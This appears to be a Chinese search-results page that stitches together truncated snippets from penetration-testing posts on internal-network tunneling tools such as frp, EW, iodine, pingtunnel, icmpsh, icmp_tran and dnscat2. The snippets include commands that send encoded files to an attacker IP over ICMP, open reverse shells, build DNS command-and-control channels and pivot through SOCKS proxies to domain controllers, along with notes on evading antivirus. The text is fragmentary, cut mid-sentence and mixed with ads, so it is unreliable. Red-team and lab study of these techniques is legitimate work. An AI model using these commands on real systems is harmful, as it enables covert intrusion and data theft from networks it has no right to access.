目录 前言 一、概述 1、简介 2、原理 3、使用 (1)服务端 (2)客户端 二、实践 1、场景 2、建立隧道 (1)攻击机监听 (2)目标机发送 (3)攻击机转换 3、抓包看看...:内网渗透系列:内网隧道之ICMP隧道 3、使用 (1)服务端 tucpdump监听并下载文件 sudo tcpdump -i eth0 icmp and icmp[icmptype]=icmp-echo.../tran.sh (2)客户端 windows icmp_tran.exe linux sudo python icmp_tran.py <attacker-IP...os.system("certutil -encode "+ file +" test.txt") # windows os.system("base64 "+ file +" > test.txt") # linux...payload内容 payload内容这个还是没办法避免的事情 正常ping命令: windows系统下ping默认传输的是:abcdefghijklmnopqrstuvwabcdefghi,共32bytes linux
(Kali linux):192.168.188.134、192.168.23.131 内网目标主机(Windows 7):192.168.23.128 网络拓扑: 网络关系:Web服务器模拟企业对外提供...Web服务的机器,该机器可以通内网,同时向公网提供服务,内网存在一台Windows 7机器,Web服务器可以与该机器连接。...测试目标:假定现在我们获取到了边界Web服务器的权限,之后想用ICMP搭建通往内网的隧道,连接内网Windows Server 2008 R2的3389端口 测试步骤: 在内网Web边界服务器执行以下指令...:指定要转发的目标机器的端口 -x: 指定连接密码 最后在本地Windows 10主机中使用mstsc访问VPS主机(192.168.188.129——>Kali linux)的1080端口: 之后会弹出以下认证界面...Web主机中ptunnel终端显示如下: 当我们想要使用ICMP隧道内网主机的22端口时,直接修改命令即可,例如: .
image.png 视频内容 内网渗透之内网隧道构建 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。
内网隐藏通信隧道技术——EW隧道 EarthWorm中的应用 在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。...该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,现在使用人数较多,如果在真实环境下使用,需要免杀 下载地址:https://github.com/idlefire/ew...正向SOCKS v5服务器 以下命令使用目标为其拥有一个外网IP地址的情况: 在内网web服务器与外网代理机器之间架设隧道,访问域控 ew_for_Win.exe -s ssocksd -l 9999...代理成功 二级网络环境(b) A:无公网IP,可以访问外网,无法访问内网资源 内网web服务器 B:只能访问内网资源,无法访问外网 域控 在代理机器,内网域控,内网web服务器上进行模拟: 先在代理机器上执行...: ew -s lcx_listen -l 1080 -e 888 即在公网代理机器中添加转接隧道,将1080端口收到的代理请求转发给888端口 B主机执行,利用socksd方式启动999端口的SOCKS
工具使用 「这里linux是公网VPS,作为服务端 windows是内网服务器,作为客户端」 在linux中解压命令: tar zxvf frp_0.37.0_linux_amd64.tar.gz...local_port = 80 #本地端口(根据协议修改) remote_port = 6001 #远程服务器的ip端口 一台Windows和一台Linux建立隧道连接 server_addr = 102.224.185.237...web服务器:192.168.27.170 10.10.3.100」 「域控:10.10.3.6 10.10.21.5」 内网隐藏通信隧道技术——FRP隧道 域控不能直接连接外网vps,可以连接内网...首先在外网vps上启动frps服务,在内网的web服务器与域控之间建立一条frps隧道,内网web服务器启动frps,域控启动frpc服务,相互连接,建立起一条一级代理隧道,此时web服务器就作为跳板了...vps,可以连接内网域控,内网域控不能直接连接vps,可以连接内网web服务器,内网web服务器可以直接连接外网vps,所以通过内网web服务器作为跳板,将socks代理建设在内网域控中后,将打通隧道进行横向攻击核心区机器
---- 内网隧道之spp 前言 本文研究支持多协议双向代理的一个工具,spp github:https://github.com/esrrhs/spp 一、概述 1、简介 2020年新鲜出炉,持续更新...reverse_proxy_client -server 192.168.10.128:8888 -fromaddr :2222 -toaddr :80 -proxyproto tcp 可以开启80端口的Apache看看 (3)隧道建立...test" -type reverse_socks5_client -server 192.168.10.128 -fromaddr :1080 -proxyproto tcp -proto (3)建立隧道
---- 内网隧道之iox 前言 本文研究端口转发 & SOCKS代理工具的一个工具,iox github:https://github.com/EddieIvan01/iox 一、概述 1、简介 最后更新于.../iox proxy -l 9999 -l 1080 #注意,这两个端口是有顺序的 #接着连接内网主机 proxychains.conf socks5://1.1.1.1:1080 $ proxychains.../iox fwd -r 127.0.0.1:80 -r *192.168.10.128:2222 -k 123456 (3)隧道建立 还可以nc、ssh等,根据端口来确定服务 (4)抓包看看.../iox proxy -r 192.168.10.128:2222 (3)隧道建立 之后通过proxychains可以执行命令 如nmap扫描端口信息 proxychains4 nmap -p 1-1000
---- 内网隧道之Venom 前言 本文研究端口转发&SOCKS5&SSH的一个工具,Venom github:https://github.com/Dliv3/Venom/ 一、概述 1、简介 玄武实验室的...,用Go编写,多级代理工具,功能极强,但是现在基本被各大杀软查杀了(需做好免杀) 多级socks5代理 多级端口转发 端口复用 (apache/mysql/…) ssh隧道.../agent_macos_x64 -rhost 192.168.0.103 -rport 8889 -passwd dlive@dubhe (4)三层代理 可参考 内网代理神器Venom及三层代理演示...内网穿透工具—Venom使用教程 二、实践 1、测试场景 攻击机(服务端):kali 192.168.10.128 目标机(客户端):ubuntu 192.168.10.129 都没有限制TCP...连接 2、建立隧道 (1)服务端 .
---- 内网隧道之frp 前言 本文研究通过TCP和HTTP出网的一个工具,frp github:https://github.com/fatedier/frp 一、概述 1、简介 写于2015年,持续更新...frpc.ini配置文件中的端口号 二、实践 1、测试场景 攻击机(服务端):kali 192.168.10.128 目标机(客户端):ubuntu 192.168.10.129 都没有限制TCP连接 2、建立隧道.../frpc.ini (3)隧道建立 类似地,可以根据服务来确定端口 3、抓包看看 三次握手建立连接 调用服务期间 三、探索 1、源码与分析 frp 的程序代码为了糅合 frpc
---- 内网隧道之NATBypass 前言 本文研究端口转发的一个工具,NATBypass github:https://github.com/cw1997/NATBypass 一、概述 1、简介 最后更新于...本地开始主动连接ip1:port1主机和ip2:port2主机,当连接成功之后,nb负责这两个主机之间的数据转发 nb -log filedirpath #日志,不要使用包含空格以及各种特殊字符的文件路径,可使用Linux...命令将转发数据实时显示出来 二、实践 1、测试场景 攻击机(服务端):kali 192.168.10.128 目标机(客户端):ubuntu 192.168.10.129 都没有限制TCP连接 2、建立隧道
---- 内网隧道之iodine 前言 本文研究DNS隧道的一个经典工具,iodine github:https://github.com/yarrick/iodine 一、概述 1、简介 持续更新,...(2)客户端 linux环境: iodine -f -P vpn.abc.ltd -M 200 -r:iodine有时会自动将DNS隧道切换为UDP隧道,该参数的作用是强制在任何情况下使用...DNS隧道 -M:指定上行主机的大小。...10.0.0.1 (2)客户端 建立隧道前状态 建立隧道 iodine -f -r -P 123456 dnstunnel.test.com 也是多了个网卡dns0,ip为10.0.0.2...(3)ssh 此时隧道建立成功,在服务端会打印出心跳包 尝试ssh 隧道成功建立,流量可代理 此时,打印出的包如下: 3、抓包看看 建立隧道,域名让人没眼看 虚拟网卡中
---- 内网隧道之nps 前言 本文研究支持多种代理的一个工具,nps github:https://github.com/ehang-io/nps 一、概述 1、简介 写于2018年,持续更新,用Go...编写,支持多种协议,有GUI 需要管理员权限 协议支持全面,:tcp、udp、http(s)、socks5、p2p、http代理… 全平台兼容(linux、windows、macos、群辉等),支持一键安装为系统服务.../nps install 对于windows,管理员身份运行cmd,进入安装目录 nps.exe install 启动 对于linux|darwin:sudo nps start...对于windows,管理员身份运行cmd,进入程序目录:nps.exe start 安装后windows配置文件位于 C:\Program Files\nps,linux和darwin位于/etc/nps.../nps install 启动 nps start 登录(看这个界面就给跪了,太强了) 设置一个客户端 点击上图的隧道 (2)客户端 启动 .
---- 内网隧道之pingtunnel 前言 本文研究ICMP隧道的一个工具,pingtunnel github:https://github.com/esrrhs/pingtunnel 一、概述 1...sock5 流量伪装成 icmp 流量进行转发的工具,跨平台 条件: 目标机(客户端)可以ping出去 目标机可能要管理员权限 windows要装有wincap 2、原理 ICMP隧道原理参见...:内网渗透系列:内网隧道之ICMP隧道 3、使用 (1)直连出网 攻击机(服务端)启动隧道并关闭系统默认的 ping sudo ....payload内容 躲不过去的payload内容检测 正常ping命令: windows系统下ping默认传输的是:abcdefghijklmnopqrstuvwabcdefghi,共32bytes linux...结语 用go写的icmp隧道,比其他icmp隧道要牛一点 ---- 红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。
---- 内网隧道之icmpsh 前言 本文研究ICMP隧道的一个工具,icmpsh github:https://github.com/bdamele/icmpsh 一、概述 1、简介 最后更新于2013...条件: 目标机可以ping出来 目标机是windows 2、原理 ICMP隧道原理参见:内网渗透系列:内网隧道之ICMP隧道 客户端开启cmd进程,通过pipe放入icmp隧道进程,将命令和回显放进...python icmpsh_m.py 客户端(目标机,win)执行 icmpsh.exe -t 然后就建立了隧道...(2)目标机 建立隧道 icmpsh.exe -t 192.168.227.129 (3)隧道建立成功 成功建立隧道并反弹shell 可以发现对中文名不友好 3、抓包看看 连接上迅速反弹shell...内容 长度已经限制了 那么就是内容了确实是不同的 正常ping命令: windows系统下ping默认传输的是:abcdefghijklmnopqrstuvwabcdefghi,共32bytes linux
环境配置 该操作在vm虚拟机中完成,提前安装了Windows7、kali linux、Windows server2008。...分别是win7、server2008、kali linux 因为需要从不同的角度来进行配置ip地址,所以在这里先不固定ip地址。...内网代理 内网代理分为以下两个部分: 正向代理:已控服务器监听端口,通过这个端口形成一个正向的隧道,由代理机器代替主机去访问内网目标。...例如:VPS监听本地端口,已控内网服务器来连接此端口,形成一个隧道。如果内网设备连接外网,就无法回弹只能再想其他办法。 3....4.2 Linux下用 这里使用的是一台 Ubuntu 16.04 10.211.55.14 还有一台kali linux 10.211.55.23 Usage:.
支持icmp、kcp、quic 支持双向的代理 可以自由进行内部外协议的组合 通过一个工具基本可以满足演练过程中打隧道的要求(可惜不支持dns协议)。...8080 -proxyproto tcp 挂代理 socks5:vps:8080,查询当前ip为client,已进入client网络环境 内外部协议封装 该功能支持各种协议的嵌套使用,可使用于各种内网极端环境...在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。...proto ricmp 挂代理socks5:vps:8080,查看当前ip为client出口地址,已进入client网络环境 ICMP+cobaltstrike Server 反向代理用于进入目标内网
网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel) 目录 ICMP隧道 使用ICMP搭建隧道(PingTunnel) 使用ICMP搭建隧道...拓扑图如下: 192.168.10.X 模拟公网地址,Web服务器模拟企业对外提供Web服务的机器,该机器可以通内网,同时向公网提供服务。内网存在一台WIndows机器,Web服务器可以与该机器连接。...现在我们获取到了Web服务器的权限,想用ICMP搭建通往内网的隧道,连接内网Windows的3389端口。...使用ICMP搭建隧道(Icmptunnel) 适用场景:目标机器是Linux服务器的情况 攻击机:Redhat7 192.1.68.10.20 靶机:Centos7 192.168.10.13 ICMP...虽然ICMP echo流量在网络边界通常会被过滤,但这种方法仍然可能对从企业内网出连到互联网的技术有一定帮助。
---- 内网隧道之Neo-reGeorg 前言 本文研究HTTP隧道的一个工具,Neo-reGeorg github:https://github.com/L-codes/Neo-reGeorg 一...> -t 二、实践 1、测试场景 攻击机(服务端):kali 192.168.10.128 目标机(客户端):ubuntu 192.168.10.129 开放web服务 2、建立隧道...Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0", "Mozilla/5.0 (X11; Linux...AppleWebKit/600.7.11 (KHTML, like Gecko) Version/8.0.7 Safari/600.7.11", "Mozilla/5.0 (X11; Linux...Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0", "Mozilla/5.0 (X11; Ubuntu; Linux
---- 内网渗透系列:内网隧道之icmp_tran 前言 本文研究ICMP隧道的一个工具,icmp_tran github:github.com/NotSoSecure/icmp_tunnel_ex_filtrate...:内网渗透系列:内网隧道之ICMP隧道 3、使用 (1)服务端 tucpdump监听并下载文件 sudo tcpdump -i eth0 icmp and icmp[icmptype]=icmp-echo.../tran.sh (2)客户端 windows icmp_tran.exe linux sudo python icmp_tran.py <attacker-IP..."certutil -encode "+ file +" test.txt") # windows os.system("base64 "+ file +" > test.txt") # linux...payload内容 payload内容这个还是没办法避免的事情 正常ping命令: windows系统下ping默认传输的是:abcdefghijklmnopqrstuvwabcdefghi,共32bytes linux
---- 内网隧道之dnscat2 前言 本文研究DNS隧道的一个工具,dnscat2 github:https://github.com/iagox86/dnscat2 一、概述 1、简介 最后更新于...服务器是用 ruby 编写 IP over DNS,通过 DNS 协议创建加密的命令和控制 (C&C) 通道,直接运行工具即可实现数据传输、文件操作等命令和控制功能 利用合法DNS服务器实现DNS隧道...运行模式如大多DNS隧道工具一样:Dnscat2客户端->DNS服务商->Dnscat2服务端。 如果没有购买域名,还可以在UDP/53上使用直连。...secret=123456 abc.com dnscat --dns server=,port=553 --secret=123456 (3)使用隧道...可以获取,这里展示一个shell 3、抓包看看 建立隧道 心跳包,CNAME、TXT、MX混用,但是域名是异常域名 三、探索 1、源码与分析 TODO 2、检测与绕过 (1)特征字符串
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
